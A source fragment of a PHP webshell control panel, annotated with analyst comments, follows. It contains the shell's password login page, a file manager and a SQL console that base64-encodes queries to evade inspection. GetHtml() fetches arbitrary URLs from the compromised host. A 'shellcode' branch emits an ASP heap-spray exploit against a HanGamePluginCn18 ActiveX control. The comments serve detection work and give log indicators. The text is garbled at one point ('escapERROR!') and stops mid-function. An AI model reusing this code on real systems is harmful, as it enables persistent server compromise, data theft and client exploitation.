 * NOTE(review): a $filetype that is not a key of $dim makes the foreach
 * iterate over an undefined index.
 */
function muma($filecode,$filetype){ 
 
	$dim = array( 
 
	"php" => array("eval(","exec("), 
 
	"asp" => array("WScript.Shell","execute(","createtextfile("), 
 
	"aspx" => array("Response.Write(eval(","RunCMD(","CreateText()"), 
 
	"jsp" => array("runtime.exec(") 
 
	); 
 
	foreach($dim[$filetype] as $code){ 
 
		if(stristr($filecode,$code)) return true; 
 
	} 
 
} 
 
 
 
/**
 * Return true when path $file contains (ignoring case) any of the
 * '|'-separated fragments in $ftype. Nothing is returned otherwise.
 *
 * Despite the name, this is the file-name filter that selects targets for
 * the "guama" mode of do_passreturn().
 */
function debug($file,$ftype){ 
 
	$type=explode('|',$ftype); 
 
	foreach($type as $i){ 
 
		if(stristr($file,$i))	return true; 
 
	} 
 
} 
 
 
 
/*---string---*/ 
 
 
 
/**
 * Replace each "//" pair in $path with a single "/" (one left-to-right pass).
 */
function str_path($path)
{
	$collapsed = str_replace('//', '/', $path);

	return $collapsed;
}
 
 
 
/**
 * Terminate the request with a script that shows $msg in an alert box and
 * navigates the browser one step back.
 *
 * NOTE(review): $msg is placed inside a single-quoted JavaScript string
 * without any escaping.
 */
function msg($msg){ 
 
	die("<script>window.alert('".$msg."');history.go(-1);</script>"); 
 
} 
 
 
 
/**
 * Return the URL-encoded parent directory of $nowpath, with backslashes in
 * the parent converted to forward slashes first.
 */
function uppath($nowpath)
{
	$parent = dirname($nowpath);
	$parent = str_replace('\\', '/', $parent);

	return urlencode($parent);
}
 
 
 
/**
 * Normalise backslashes in $key: double backslashes are first collapsed to
 * single ones, then every backslash is doubled.
 */
function xxstr($key)
{
	$single = str_replace("\\\\", "\\", $key);

	return str_replace("\\", "\\\\", $single);
}
 
 
 
/*---html---*/ 
 
 
 
/**
 * Emit a link to $url labelled $name that opens in a new window.
 * Both values are interpolated into the markup without escaping.
 * html_n() is defined elsewhere in the file.
 */
function html_ta($url,$name){ 
 
	html_n("<a href=\"$url\" target=\"_blank\">$name</a>"); 
 
} 
 
 
 
/**
 * Emit a link to $url labelled $name; $where is inserted verbatim as extra
 * attributes. None of the values are escaped.
 */
function html_a($url,$name,$where=''){ 
 
	html_n("<a href=\"$url\" $where>$name</a> "); 
 
} 
 
 
 
/**
 * Emit an <img> tag whose source is this script's own `?img=` handler with
 * $url as the value (unescaped).
 */
function html_img($url){ 
 
	html_n("<img src=\"?img=$url\" border=0>"); 
 
} 
 
 
 
/**
 * Emit a button that sends the browser one step back in its history.
 * The button label is empty in this decoded copy.
 */
function back(){ 
 
	html_n("<input type='button' value='' onclick='history.back();'>"); 
 
} 
 
 
 
/**
 * Emit two radio buttons sharing the fixed field name "return": the first
 * (value $v1, label $namei) is pre-checked, the second has value $v2 and
 * label $namet. Values and labels are not escaped.
 */
function html_radio($namei,$namet,$v1,$v2){ 
 
	html_n('<input type="radio" name="return" value="'.$v1.'" checked>'.$namei); 
 
	html_n('<input type="radio" name="return" value="'.$v2.'">'.$namet.'<br><br>'); 
 
} 
 
 
 
/**
 * Emit an <input> element of the given $type, $name, $value and $size.
 *
 * With $mode true the input carries `checked` and $text follows it;
 * otherwise $text precedes it. No argument is escaped.
 */
function html_input($type,$name,$value = '',$text = '',$size = '',$mode = false){ 
 
	if($mode){ 
 
		html_n("<input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\" checked>$text"); 
 
	}else{ 
 
		html_n("$text <input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\">"); 
 
	} 
 
} 
 
 
 
/**
 * Emit three client-side JavaScript helpers through html_n():
 * base64encode(), utf16to8() and utf8to16().
 *
 * Analyst note: the SQL console earlier in the file calls base64encode() on
 * the query text before submitting the form, and the server side applies
 * base64_decode() to the `nsql` field. SQL statements sent through this
 * tool therefore travel base64-encoded in the POST body, and plain-text
 * keyword matching on request bodies will not see them.
 */
function html_base(){ 
 
html_n('function base64encode(str){ 
 
	var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 
 
    var out, i, len; 
 
    var c1, c2, c3; 
 
    len = str.length; 
 
    i = 0; 
 
    out = ""; 
 
    while (i < len) { 
 
        c1 = str.charCodeAt(i++) & 0xff; 
 
        if (i == len) { 
 
            out += base64EncodeChars.charAt(c1 >> 2); 
 
            out += base64EncodeChars.charAt((c1 & 0x3) << 4); 
 
            out += "=="; 
 
            break; 
 
        } 
 
        c2 = str.charCodeAt(i++); 
 
        if (i == len) { 
 
            out += base64EncodeChars.charAt(c1 >> 2); 
 
            out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4)); 
 
            out += base64EncodeChars.charAt((c2 & 0xF) << 2); 
 
            out += "="; 
 
            break; 
 
        } 
 
        c3 = str.charCodeAt(i++); 
 
        out += base64EncodeChars.charAt(c1 >> 2); 
 
        out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4)); 
 
        out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6)); 
 
        out += base64EncodeChars.charAt(c3 & 0x3F); 
 
    } 
 
    return out; 
 
} 
 
function utf16to8(str) { 
 
var out, i, len, c; 
 
out = ""; 
 
len = str.length; 
 
for(i = 0; i < len; i++) { 
 
c = str.charCodeAt(i); 
 
if ((c >= 0x0001) && (c <= 0x007F)) { 
 
out += str.charAt(i); 
 
} else if (c > 0x07FF) { 
 
out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F)); 
 
out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F)); 
 
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F)); 
 
} else { 
 
out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F)); 
 
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F)); 
 
} 
 
} 
 
return out; 
 
} 
 
function utf8to16(str) { 
 
  var out, i, len, c; 
 
  var char2, char3; 
 
  out = ""; 
 
  len = str.length; 
 
  i = 0; 
 
  while(i < len) { 
 
    c = str.charCodeAt(i++); 
 
    switch(c >> 4) { 
 
      case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: 
 
        out += str.charAt(i-1); 
 
        break; 
 
      case 12: case 13: 
 
        char2 = str.charCodeAt(i++); 
 
        out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F)); 
 
        break; 
 
      case 14: 
 
        char2 = str.charCodeAt(i++); 
 
        char3 = str.charCodeAt(i++); 
 
        out += String.fromCharCode(((c & 0x0F) << 12) | 
 
        ((char2 & 0x3F) << 6) | 
 
        ((char3 & 0x3F) << 0)); 
 
        break; 
 
    } 
 
  } 
 
  return out; 
 
} 
 
'); 
 
} 
 
 
 
/**
 * Emit a <textarea> named $name with $cols columns, $rows rows and initial
 * content $value. $value is inserted without HTML escaping.
 */
function html_text($name,$cols,$rows,$value = ''){ 
 
	html_n("<br><br><textarea name=\"$name\" COLS=\"$cols\" ROWS=\"$rows\" >$value</textarea>"); 
 
} 
 
 
 
/**
 * Emit a <select> named $name with one <option> per $array entry (key is
 * the option value, value is the label). The option whose key loosely
 * equals $mode is marked selected; $change is inserted verbatim as extra
 * attributes on the <select> tag.
 *
 * NOTE(review): the foreach reuses $name as its key variable, overwriting
 * the parameter after the opening tag has already been emitted.
 */
function html_select($array,$mode = '',$change = '',$name = 'class'){ 
 
	html_n("<select name=$name $change>"); 
 
	foreach($array as $name => $value){ 
 
		if($name == $mode){ 
 
			html_n("<option value=\"$name\" selected>$value</option>"); 
 
		}else{ 
 
			html_n("<option value=\"$name\">$value</option>"); 
 
		} 
 
	} 
 
	html_n("</select>"); 
 
} 
 
 
 
/**
 * Emit $name wrapped in a <font> tag with the given $color and $size.
 * None of the values are escaped.
 */
function html_font($color,$size,$name){ 
 
	html_n("<font color=\"$color\" size=\"$size\">$name</font>"); 
 
} 
 
 
 
/**
 * Fetch $url from the compromised host and return the response body.
 *
 * Three transports are tried in order, each only if the previous one left
 * $c empty: a hand-built HTTP/1.0 request over fsockopen(), then cURL, then
 * file_get_contents(). If all of them yield nothing, a JavaScript
 * document.write() snippet referencing $url is echoed instead and the
 * function falls off the end without a return value.
 *
 * Analyst notes:
 *  - The socket and cURL paths both send the fixed User-Agent
 *    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)". Outbound requests
 *    from a web-server process carrying that string are a usable detection
 *    signal in proxy or egress logs.
 *  - $url is used as given; nothing here restricts scheme, host or port.
 *
 * @param string $url URL to retrieve
 * @return mixed response body when non-empty; otherwise nothing is returned
 */
function GetHtml($url) 
 
{ 
 
      $c = ''; 
 
      $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)'; 
 
      // Transport 1: raw socket with a manually assembled request.
      if(function_exists('fsockopen')){ 
 
    	$link = parse_url($url); 
 
	    // 'path', 'query' and 'port' are read without checking that parse_url()
	    // returned them. The scheme is never consulted, so this path always
	    // speaks plain HTTP.
	    $query=$link['path'].'?'.$link['query']; 
 
	    $host=strtolower($link['host']); 
 
	    $port=$link['port']; 
 
	    // Default to port 80 when the URL carries no explicit port.
	    if($port==""){$port=80;} 
 
	    // 10-second connect timeout.
	    $fp = fsockopen ($host,$port, $errno, $errstr, 10); 
 
	    if ($fp) 
 
	      { 
 
		    // NOTE(review): parse_url() normally returns the path with its leading
		    // "/", so the request target probably starts with "//". Confirm
		    // against a capture if this matters for signatures.
		    $out = "GET /{$query} HTTP/1.0\r\n";  
 
		    $out .= "Host: {$host}\r\n";  
 
		    // Same User-Agent as $useragent, repeated as a literal.
		    $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";  
 
		    $out .= "Connection: Close\r\n\r\n";  
 
		    fwrite($fp, $out); 
 
		    // 1 while still reading response headers, 0 once the blank
		    // separator line has been seen.
		    $inheader=1; 
 
		    while(!feof($fp))  
 
		         {$line=fgets($fp,4096);	 
 
			      // $contents is appended to without being initialised first.
			      if($inheader==0){$contents.=$line;} 
 
			      if ($inheader &&($line=="\n"||$line=="\r\n")){$inheader = 0;} 
 
		    }  
 
		    fclose ($fp);  
 
		    $c= $contents; 
 
	      } 
 
        } 
 
		// Transport 2: cURL, 15-second timeout, body returned as a string.
		if(empty($c) && function_exists('curl_init') && function_exists('curl_exec')){ 
 
            $ch = curl_init(); 
 
            curl_setopt($ch, CURLOPT_URL, $url); 
 
            curl_setopt($ch, CURLOPT_TIMEOUT, 15); 
 
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); 
 
            curl_setopt($ch, CURLOPT_USERAGENT, $useragent); 
 
            $c = curl_exec($ch); 
 
            curl_close($ch); 
 
        } 
 
        // Transport 3: URL wrapper, only when allow_url_fopen is enabled.
        if(empty($c) && ini_get('allow_url_fopen')){ 
 
            $c = file_get_contents($url); 
 
        } 
 
		// Nothing fetched server-side: emit a script line that makes the
		// viewing browser reference $url as a CSS cursor. $url is placed
		// in the output without escaping.
		if(empty($c)){ 
 
            echo "document.write('<DIV style=\'CURSOR:url(\"$url\")\'>');"; 
 
        } 
 
		if(!empty($c)) 
 
		{ 
 
        return $c; 
 
		} 
 
 } 
 
 
 
/**
 * Print the outer page of the panel: a title, an address bar form and two
 * iframes.
 *
 * The top row shows the result of gethostbyname() on $_SERVER['SERVER_NAME']
 * and a GET form (hidden field eanver=main, text field "path") targeting the
 * frame named "main". Below it, one iframe loads "?eanver=left" and the other
 * "?eanver=main".
 *
 * Analyst note: the "eanver" query parameter with the values seen here is a
 * convenient string to search for in web-server access logs.
 *
 * @param mixed $path      pre-filled value of the path input (not escaped)
 * @param mixed $shellname text placed in <title> (not escaped)
 */
function html_main($path,$shellname){ 
 
$serverip=gethostbyname($_SERVER['SERVER_NAME']); 
 
print<<<END 
 
<html><title>{$shellname}</title> 
 
<table width='100%'><tr><td width='150' align='center'>{$serverip}</td><td><form method='GET' target='main'><input type='hidden' name='eanver' value='main'><input name='path' style='width:100%' value='{$path}'></td><td width='140' align='center'><input name='Submit' type='submit' value=''> <input type='submit' value='' onclick='main.location.reload()'></td></tr></form></table> 
 
END; 
 
	html_n("<table width='100%' height='95.7%' border=0 cellpadding='0' cellspacing='0'><tr><td width='170'><iframe name='left' src='?eanver=left' width='100%' height='100%' frameborder='0'>"); 
 
	html_n("</iframe></td><td><iframe name='main' src='?eanver=main' width='100%' height='100%' frameborder='1'>"); 
 
	html_n("</iframe></td></tr></table></html>"); 
 
} 
 
 
 
/**
 * Print the login page: an inline stylesheet and a centred box containing a
 * link and a password form.
 *
 * The form uses method="post" with no action attribute and a single password
 * field named "postpass". The link points at $myurl and is labelled with
 * $shellname; both are interpolated without escaping.
 *
 * Analyst note: POST requests carrying a "postpass" field to an unexpected
 * .php file are a log indicator for this family of panel.
 *
 * @param mixed $shellname link text shown above the form
 * @param mixed $myurl     href of that link (opened with target=_blank)
 */
function islogin($shellname,$myurl){ 
 
print<<<END 
 
<style type="text/css">body,td{font-size: 12px;color:#00ff00;background-color:#000000;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}.C{background-color:#000000;border:0px}.cmd{background-color:#000;color:#FFF}body{margin: 0px;margin-left:4px;}BODY {SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}.am{color:#888;font-size:11px;}</style> 
 
<body style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)" scroll=no><center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href='{$myurl}' target='_blank'>{$shellname}</a><br><br><form method='post'><input name='postpass' type='password' size='22'> <input type='submit' value=''><br><br><br><font color=#3399FF></font><br></div></center> 
 
END; 
 
} 
 
 
 
/**
 * Write the input fields of a MySQL connection form and close the form.
 *
 * Emits six inputs through html_input() (defined outside this excerpt):
 * sqlhost, sqlport, sqluser, sqlpass, sqldb and a submit button named
 * sqllogin. The literal defaults are "localhost", "3306", "root", an empty
 * password and "dbname". The opening <form> tag is not written here.
 *
 * NOTE(review): the argument order of html_input() appears to be
 * (type, name, value, label prefix, size); confirm against its definition.
 */
function html_sql(){ 
 
	html_input("text","sqlhost","localhost","<br>MYSQL","30"); 
 
	html_input("text","sqlport","3306","<br>MYSQL","30"); 
 
	html_input("text","sqluser","root","<br>MYSQL","30"); 
 
	html_input("password","sqlpass","","<br>MYSQL","30"); 
 
	html_input("text","sqldb","dbname","<br>MYSQL","30"); 
 
	html_input("submit","sqllogin","","<br>"); 
 
	html_n('</form>'); 
 
} 
 
 
 
/**
 * Shorten $data for display by cutting it at $len bytes and appending '...'.
 *
 * Lengths are measured with strlen(), i.e. in bytes rather than characters.
 *
 * @param string $data text to shorten
 * @param int    $len  number of leading bytes to keep
 * @return string $data unchanged when it is shorter than $len, otherwise its
 *                first $len bytes followed by '...'
 */
function Mysql_Len($data,$len) 
 
{ 
 
	// The comparison is strict "<", so a string of exactly $len bytes is not
	// returned here and gets '...' appended below.
	if(strlen($data) < $len) return $data; 
 
	// With no length argument, substr_replace() replaces everything from
	// offset $len to the end of the string.
	return substr_replace($data,'...',$len); 
 
} 
 
 
 
/**
 * Echo $data followed by a newline.
 *
 * This is the output primitive the other html_* and css_* helpers on this
 * page call; it applies no escaping or encoding of its own.
 *
 * @param mixed $data text to write to the response
 */
function html_n($data){ 
 
	echo "$data\n"; 
 
} 
 
 
 
/*---css---*/ 
 
 
 
/**
 * Serve one of the panel's embedded icons as a GIF and terminate the request.
 *
 * $images maps an icon key (exe, dir, txt, html, js, xml, mp3, img, title,
 * rar) to a base64 string. The function sends "Content-type: image/gif",
 * echoes the decoded entry for $img and calls die().
 *
 * The key is not checked against the table. In the script shown on this page
 * the argument comes from $_GET['img'], so an unknown key simply indexes a
 * missing array element.
 *
 * Analyst note: requests of the form "?img=<key>" returning image/gif from a
 * .php file are a side effect of the panel being browsed.
 *
 * @param mixed $img icon key to look up in the table
 */
function css_img($img){ 
 
	// Icon table: key => base64-encoded GIF data, split across concatenated
	// string literals.
	$images = array( 
 
	"exe"=> 
 
	"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". 
 
	"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". 
 
	"xhIAOw==", 
 
	"dir"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA". 
 
	"AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE". 
 
	"oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", 
 
	"txt"=> 
 
	"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". 
 
	"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". 
 
	"UpPWG3Ig6Hq/XmRjuZwkAAA7", 
 
	"html"=> 
 
	"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". 
 
	"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". 
 
	"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". 
 
	"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". 
 
	"ADs=", 
 
	"js"=> 
 
	"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". 
 
	"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". 
 
	"a00AjYYBbc/o9HjNniUAADs=", 
 
	"xml"=> 
 
	"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". 
 
	"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
 
	"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". 
 
	"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". 
 
	"IQA7", 
 
	"mp3"=> 
 
	"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". 
 
	"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". 
 
	"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", 
 
	"img"=> 
 
	"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". 
 
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". 
 
	"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". 
 
	"FxEAOw==", 
 
	"title"=>"R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+". 
 
	"mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
 
	"ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL". 
 
	"I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7", 
 
	"rar"=>"R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA". 
 
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
 
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
 
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
 
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
 
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
 
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
 
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
 
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
 
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
 
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
 
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
 
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
 
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
 
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/". 
 
    "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b". 
 
    "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC". 
 
    "aNOmRcjVj02tPxPCzfkvIAA7" 
 
	); 
 
  header('Content-type: image/gif'); 
 
  echo base64_decode($images[$img]); 
 
  // Ends the request so nothing else is appended to the image bytes.
  die(); 
 
} 
 
 
 
/**
 * Pick the icon key for a file name from its last three characters.
 *
 * The suffix is compared as-is (no lower-casing), so upper-case extensions
 * fall through to the default. Two-letter extensions are matched together
 * with their dot (".js", ".rm", ".gz"), and "tml" stands in for ".html".
 *
 * @param string $file file name or path
 * @return string one of 'img', 'html', 'exe', 'xml', 'js', 'mp3', 'rar',
 *                or 'txt' when nothing matches
 */
function css_showimg($file){ 
 
	$it=substr($file,-3); 
 
	// Every case returns immediately; the trailing "break" statements are
	// never reached.
	switch($it){ 
 
		case "jpg": case "gif": case "bmp": case "png": case "ico": return 'img';break; 
 
		case "htm": case "tml": return 'html';break; 
 
		case "exe": case "com": return 'exe';break; 
 
		case "xml": case "doc": return 'xml';break; 
 
		case ".js": case "vbs": return 'js';break; 
 
		case "mp3": case "wma": case "wav": case "swf": case ".rm": case "avi":case "mp4":case "mvb": return 'mp3';break; 
 
		case "rar": case "tar": case ".gz": case "zip":case "iso": return 'rar';break; 
 
  	default: return 'txt';break; 
 
	} 
 
} 
 
 
 
/**
 * Emit one of several inline <script> blocks selected by $num, or, for
 * $num == "shellcode", return a classic-ASP page as a string.
 *
 * Branches:
 *  - "shellcode": returns (does not print) an ASP page declared with
 *    LANGUAGE="JavaScript". $code is concatenated unmodified into an
 *    unescape("...") call. The template instantiates the ActiveX ProgID
 *    "HanGamePluginCn18.HanGamePluginCn18.1", builds large repeated string
 *    blocks around the decoded $code and calls hgs_startNotify() with a long
 *    buffer. This matches the pattern of a memory-corruption exploit
 *    template rather than UI code. The ProgID and the method name are stable
 *    strings to match on when scanning web roots for this panel or for files
 *    it has generated.
 *  - "1": file-manager helpers rusurechk, rusuredel, Delok, CheckAll,
 *    CheckDate and SubmitUrl, which prompt or confirm and then navigate or
 *    submit the form with id "fileall".
 *  - "2": editor helpers: an in-page text search and a CheckDate() that
 *    validates the timestamp field and base64-encodes the "newfile" and
 *    "txt" fields before submitting the form with id "editor".
 *  - "3": Full(i), which fills DbForm with preset connection strings or SQL
 *    statements.
 *  - "4": Fulll(i), which fills sform.code with a preset configuration file
 *    name (config.inc.php, wp-config.php, ...).
 *
 * For every value other than "shellcode" the output is wrapped in
 * <script language="javascript"> ... </script>.
 *
 * @param mixed  $num  branch selector, compared with loose ==
 * @param string $code text embedded in the "shellcode" template; unused by
 *                     the other branches
 * @return string|null the ASP template for "shellcode", otherwise nothing
 */
function css_js($num,$code = ''){ 
 
	// Early return: this branch produces file content for the caller and
	// writes nothing to the response.
	if($num == "shellcode"){ 
 
		return '<%@ LANGUAGE="JavaScript" %> 
 
		<% 
 
		var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1"); 
 
		var shellcode = unescape("'.$code.'"); 
 
		var bigblock = unescape("%u9090%u9090"); 
 
		var headersize = 20; 
 
		var slackspace = headersize+shellcode.length; 
 
		while (bigblock.length<slackspace) bigblock+=bigblock; 
 
		fillblock = bigblock.substring(0, slackspace); 
 
		block = bigblock.substring(0, bigblock.length-slackspace); 
 
		while(block.length+slackspace<0x40000) block = block+block+fillblock; 
 
		memory = new Array(); 
 
		for (x=0; x<300; x++) memory[x] = block + shellcode; 
 
		var buffer = ""; 
 
		while (buffer.length < 1319) buffer+="A"; 
 
		buffer=buffer+"



"+buffer; 
 
		act.hgs_startNotify(buffer); 
 
		%>'; 
 
	} 
 
	html_n('<script language="javascript">'); 
 
	// Branch "1": helpers for the file listing. In rusuredel() the combined
	// address is stored in "URL" but the navigation uses "url", so the
	// message text is not appended to the target.
	// NOTE(review): the "ERROR!" text that splits "escape" inside SubmitUrl()
	// looks like an artefact of the decoder that produced this page, not part
	// of the original script; confirm against the encoded sample.
	if($num == "1"){ 
 
	html_n('	function rusurechk(msg,url){ 
 
		smsg = "FileName:[" + msg + "]\nPlease Input New File:"; 
 
		re = prompt(smsg,msg); 
 
		if (re){ 
 
			url = url + re; 
 
			window.location = url; 
 
		} 
 
	} 
 
	function rusuredel(msg,url){ 
 
		smsg = "Do You Suer Delete [" + msg + "] ?"; 
 
		if(confirm(smsg)){ 
 
			URL = url + msg; 
 
			window.location = url; 
 
		}  
 
	} 
 
	function Delok(msg,gourl) 
 
	{ 
 
		smsg = "[" + unescape(msg) + "]?"; 
 
		if(confirm(smsg)) 
 
		{ 
 
			if(gourl == \'b\') 
 
			{ 
 
				document.getElementById(\'actall\').value = escape(gourl); 
 
				document.getElementById(\'fileall\').submit(); 
 
			} 
 
			else window.location = gourl; 
 
		} 
 
	} 
 
	function CheckAll(form) 
 
	{ 
 
		for(var i=0;i<form.elements.length;i++) 
 
		{ 
 
			var e = form.elements[i]; 
 
			if (e.name != \'chkall\') 
 
			e.checked = form.chkall.checked; 
 
		} 
 
	} 
 
	function CheckDate(msg,gourl) 
 
	{ 
 
		smsg = ":[" + msg + "]"; 
 
		re = prompt(smsg,msg); 
 
		if(re) 
 
		{ 
 
			var url = gourl + re; 
 
			var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/;  
 
			var r = re.match(reg); 
 
			if(r==null){alert(\'!:yyyy-mm-dd hh:mm:ss\');return false;} 
 
			else{document.getElementById(\'actall\').value = gourl; document.getElementById(\'inver\').value = re; document.getElementById(\'fileall\').submit();} 
 
		} 
 
	} 
 
	function SubmitUrl(msg,txt,actid) 
 
	{ 
 
		re = prompt(msg,unescape(txt)); 
 
		if(re) 
 
		{ 
 
			document.getElementById(\'actall\').value = actid; 
 
			document.getElementById(\'inver\').value = escapERROR! 
e(re); 
 
			document.getElementById(\'fileall\').submit(); 
 
		} 
 
	}'); 
 
	// Branch "2": editor page helpers. CheckDate() calls base64encode() and
	// utf16to8(), which are not defined in this function; presumably they
	// come from the script block emitted elsewhere in the file.
	}elseif($num == "2"){ 
 
	html_n('var NS4 = (document.layers); 
 
var IE4 = (document.all); 
 
var win = this; 
 
var n = 0; 
 
function search(str){ 
 
	var txt, i, found; 
 
	if(str == "")return false; 
 
	if(NS4){ 
 
